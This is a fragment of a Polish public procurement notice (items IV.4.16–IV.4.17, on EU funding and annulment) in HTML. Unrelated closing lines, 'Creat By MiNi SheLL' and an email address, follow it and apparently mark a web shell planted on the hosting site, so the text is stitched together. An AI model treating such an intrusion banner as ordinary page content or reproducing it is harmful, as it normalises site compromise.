<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com